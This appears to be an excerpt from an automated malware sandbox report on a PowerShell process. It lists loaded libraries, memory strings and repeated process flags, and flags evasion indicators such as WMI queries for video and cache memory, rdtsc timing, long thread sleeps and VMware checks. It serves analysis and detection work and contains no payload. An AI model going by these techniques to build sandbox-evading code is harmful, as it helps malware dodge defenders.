Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: softy.pdbllcen, source: powershell.exe, 00000000.00000002.2181471518.00000202F398B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb> source: powershell.exe, 00000000.00000002.2140984176.00000202DB506000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2140984176.00000202DB480000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ll\mscorlib.pdb`: source: powershell.exe, 00000000.00000002.2181471518.00000202F3838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2181471518.00000202F38F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer328 source: powershell.exe, 00000000.00000002.2140389547.00000202D95A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2140389547.00000202D95A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb$ source: powershell.exe, 00000000.00000002.2184403820.00000202F3C00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2184403820.00000202F3C19000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2181471518.00000202F398B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2181471518.00000202F38F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2140984176.00000202DB4B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2140984176.00000202DB506000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb\ source: powershell.exe, 00000000.00000002.2184403820.00000202F3C00000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848E1D2A5 pushad ; iretd	0_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F3792B push ebx; retf	0_2_00007FF848F3796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF84900C9E8 push eax; retf 0000h	0_2_00007FF84900CB4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF84900C48C push eax; ret	0_2_00007FF84900C48D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF8491A6D25 push edi; iretd	0_2_00007FF8491A6D26
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF8491A126D push cs; retf	0_2_00007FF8491A126E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF8491E7192 push edx; retf	0_2_00007FF8491E71CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF8491E6E0C push cs; iretd	0_2_00007FF8491E6E0F

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FF848F40448 rdtsc

0_2_00007FF848F40448

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7404			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2442			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000000.00000002.2141262045.00000202DC238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2181471518.00000202F398B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2141262045.00000202DC238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2141262045.00000202DC238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2141262045.00000202DC238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2141262045.00000202DC238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2141262045.00000202DC238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2141262045.00000202DC238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2141262045.00000202DC238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2141262045.00000202DC238000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2184403820.00000202F3C00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FF848F40448 rdtsc

0_2_00007FF848F40448

